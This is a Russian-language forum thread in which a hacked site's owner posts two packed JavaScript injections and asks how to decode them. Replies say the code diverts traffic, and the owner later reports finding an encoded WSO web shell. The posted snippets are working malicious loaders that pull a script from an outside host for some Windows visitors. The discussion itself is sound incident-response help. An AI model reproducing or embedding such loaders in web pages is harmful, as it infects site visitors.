Взломали сайт. Помогите раскодировать javascript-вставку

[Nei]

Приветствую.

Взломали сайт и периодически дописывают инклуд следующего javascript-кода:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'8 e(6){b(5.g&&5.d){2 9=5.d(\\\'m\\\')[0];2 4=5.g(\\\'i\\\');4.7(\\\'j\\\',\\\'k/l\\\');4.7(\\\'6\\\',6);9.r(4)}}8 a(){2 3=c.t.n();2 f=\"v://w.u.3/s\";b((3.h(\"o\")==-1&&3.h(\"p\")!=-1)&&c.q()){e(f)}}a();\',33,33,\'||var|ua|script_tag|document|src|setAttribute|function|head_tag|includeCounter|if|navigator|getElementsByTagName|includeJavascript|url|createElement|indexOf|script|type|text|javascript|head|toLowerCase|chrome|win|javaEnabled|appendChild|0c2e3c75b783a83dade05c7ba4f531a1|userAgent|pp|http|lakaty\'.split(\'|\'),0,{}))

Помогите плз расшифровать этот код и понять какие именно зловредные действия производятся.
Пробовал различные онлайн-раскодировщики (к примеру Для просмотра ссылки Войди или Зарегистрируйся, Для просмотра ссылки Войди или Зарегистрируйся и Для просмотра ссылки Войди или Зарегистрируйся), результата нет к сожалению.
Замена eval на alert (как тут описано Для просмотра ссылки Войди или Зарегистрируйся) тоже не помогает. Похоже, что ошибка в коде.

Вот еще одна модификация кода (несколько отличается от предыдущей)

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'7 e(6){a(3.c&&3.d){5 8=3.d(\\\'j\\\')[0];5 2=3.c(\\\'k\\\');2.b(\\\'i\\\',\\\'l/m\\\');2.b(\\\'6\\\',6);8.s(2)}}7 h(){5 4=9.n.u();5 g=\"w://x.v.4/t.o\";a((4.f(\"p\")==-1&&4.f(\"r\")!=-1)&&9.q()){e(g)}}h();\',34,34,\'||script_tag|document|ua|var|src|function|head_tag|navigator|if|setAttribute|createElement|getElementsByTagName|includeJavascript|indexOf|url|includeCounter|type|head|script|text|javascript|userAgent|js|chrome|javaEnabled|win|appendChild|counter|toLowerCase|pp|http|dexedok\'.split(\'|\'),0,{}))

Заранее спасибо за помощь.

 

[bat]

слив трафа на зараженный сайт вот и все

 

[Nei]

Если действительно слив трафа, то куда?
Вообще редиректов никаких не заметил. С разных браузеров пробовал и с ПС переходил на сайт.
Разве что для мобильных редирект. Это не тестировал.

 

[bat]

Если действительно слив трафа, то куда?

ищи обфусцированный код, он скорее всего у тебя где-то в файлах сидит (скорее всего *.js)
он бывает иногда в конце кода, либо в самом начале до <?php, или вообще привязан в <div и разбросан по страницам шаблона... вариантов масса, просто он без этой строки не запустится, но работе сайта все-равно мешает

Вообще редиректов никаких не заметил. С разных браузеров пробовал и с ПС переходил на сайт.
Разве что для мобильных редирект. Это не тестировал.

ты мог просто не успеть заметить например из-за скорости инета, или сайт куда идет траф может уже не существует либо заблокирован по абузе, скрипт может срабатывать для разных устройств, например только на андроиде и т.д.

 

[Nei]

ищи обфусцированный код, он скорее всего у тебя где-то в файлах сидит (скорее всего *.js)
он бывает иногда в конце кода, либо в самом начале до <?php, или вообще привязан в <div и разбросан по страницам шаблона... вариантов масса, просто он без этой строки не запустится, но работе сайта все-равно мешает

Ну, так я вроде в первом посте и привел примеры этого обфусцированного кода.

Скриптом ai-bolit прошелся по сайту - ничего.
Сделал локальную копию всего сайта и прошелся Авирой - тоже пусто.
Бегло пробежался - сравнил размер .php файлов с оригинальной копией на моём компе - не нашел различий.

Уличная магия какая-то :/

Логи по домену на сервере тоже просмотрел - вроде ничего особо странного. Хотя их там довольно много всё внимательно просматривать устану) Хотя наверное придется (наряду с полным сравнением с оригиналом всех php-файлов сайта), если не придумаю еще как найти дыру, через которую лезут.

 

[bat]

Ну, так я вроде в первом посте и привел примеры этого обфусцированного кода.

Не-не-не!!! Там еще должен быть кусок, а в старт-посте только начальный

Скриптом ai-bolit прошелся по сайту - ничего.
Сделал локальную копию всего сайта и прошелся Авирой - тоже пусто.

Дык что один, что другой - ***но, не удивительно что не нашел ничего

Бегло пробежался - сравнил размер .php файлов с оригинальной копией на моём компе - не нашел различий.
наверное придется (наряду с полным сравнением с оригиналом всех php-файлов сайта), если не придумаю еще как найти дыру, через которую лезут.

Это надо индивидуально смотреть, пиши если что Для просмотра ссылки Войди или Зарегистрируйся, может и за отзыв посмотрю
Для просмотра ссылки Войди или Зарегистрируйся

 

[Nei]

Не-не-не!!! Там еще должен быть кусок, а в старт-посте только начальный

Дык что один, что другой - ***но, не удивительно что не нашел ничего

Это надо индивидуально смотреть, пиши если что Для просмотра ссылки Войди или Зарегистрируйся, может и за отзыв посмотрю
Для просмотра ссылки Войди или Зарегистрируйся

Ок. Спасибо за наводку. Поищу вторую часть кода.
Вообще дело принципа самому побороть зловреда) Но если уж совсем опустятся руки - обращусь, благодарю за предложение.


UPD
Нашел web-shell WSO 2.5 в одном из php-файлов

 

[esche]

Нашел web-shell WSO 2.5 в одном из php-файлов

Неужели, ai-bolit его не заметил?
Если действительно не определяет - найди время, отпиши автору..

 

[Nei]

Шелл как-то по-хитрому закодирован был. Наверное поэтому.
После раскодировки и обращения к нему через браузер начали ругаться антивирусы.

 

[KiЯilL]

UPD
Нашел web-shell WSO 2.5 в одном из php-файлов

А вот еще вопросик, статистический:
что за движок у тебя?
тебя прошелили? или стандартная уязвимость?
Благодарю за ответ , заренее